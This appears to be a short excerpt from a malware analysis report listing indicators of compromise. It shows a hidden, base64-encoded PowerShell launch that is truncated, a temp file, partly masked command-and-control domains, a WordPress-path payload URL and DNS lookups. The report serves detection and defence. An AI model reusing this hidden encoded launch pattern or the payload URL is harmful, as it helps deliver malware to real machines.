Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABZAG8AdgBoAGsAbQB4AGEAPQAnAFEAbgBiAGQAYgB3AGcAcwAnADsAJABHAHgAeQBqAGoAYwBuAHoAYgBiAHEAbQAgAD0AIAAnADkAOQAnADsAJABIAGoAYwBsAHAAZwBzAHUAZgBxAG8AZgBqAD0AJwBVAHU...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1464
- %TEMP%\1230426.cvr
- 'cu###ndroid.com':443
- 'vi###-smart.com':80
- http://www.vi###-smart.com/wp-includes/BfbRGW/
- 'cu###ndroid.com':443
- DNS ASK cu###ndroid.com
- DNS ASK ag###rshan.com
- DNS ASK so##zay.com
- DNS ASK la####adelrio.com
- DNS ASK vi###-smart.com